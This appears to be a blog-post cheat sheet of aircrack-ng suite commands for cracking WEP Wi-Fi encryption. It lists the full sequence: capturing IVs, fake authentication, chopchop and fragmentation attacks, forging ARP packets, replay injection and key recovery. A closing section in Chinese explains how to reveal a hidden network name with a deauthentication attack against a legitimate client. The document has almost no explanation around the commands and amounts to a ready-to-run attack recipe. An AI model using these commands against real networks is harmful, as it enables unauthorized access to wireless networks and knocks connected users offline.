airodump-ng --encry wep mon0
(1-5-2)
airodump-ng --bssid 00:18:F3:7A:9E:07 -c 6 --ivs -w ted mon0
(1-3)
airodump-ng --bssid 00:18:F3:7A:9E:07 -c 6 -w ted mon0
---------------------------
export MAC=00:15:AF:C8:A6:60
export AP=
aireplay-ng -1 0 -a $AP -h $MAC mon0
aireplay-ng -1 6000 -o 1 -q 10 -e
(1-4-2)
aireplay-ng -4 -b $AP -h $MAC mon0
packetforge-ng -0 -a $AP -h $MAC -k 255.255.255.255 -l 255.255.255.255 -y replay_dec-1121-044855.xor -w myarp
(1-5-2)
aireplay-ng -5 -b $AP -h $MAC mon0
packetforge-ng -0 -a $AP -h $MAC -k 255.255.255.255 -l 255.255.255.255 -y fragment-1105-104939.xor -w myarp
aireplay-ng -2 -r myarp -x 1024 mon0
(1-2)
aireplay-ng -2 -a $AP -d FF:FF:FF:FF:FF:FF -m 68 -n 68 -t 1 -f 0 mon0
(1-3)
aireplay-ng -3 -b $AP -h $MAC -x 1024 mon0
---------------------------
(1-5-2)
aircrack-ng -n 64 ted-*.ivs
(1-3)
aircrack-ng -x -f 2 ted-01.cap
===========================================
Section 1: Singling out the AP you are cracking
aireplay-ng -9 -a 00:06:4F:64:35:D8 -h 00:15:AF:C8:A6:60 mon0
獲得隱藏essid的方法,須要有合法的client端,也就是第零號攻擊的時機
aireplay-ng -0 10 -a AP'MAC -c legal client MAC rausb0
沒有留言:
張貼留言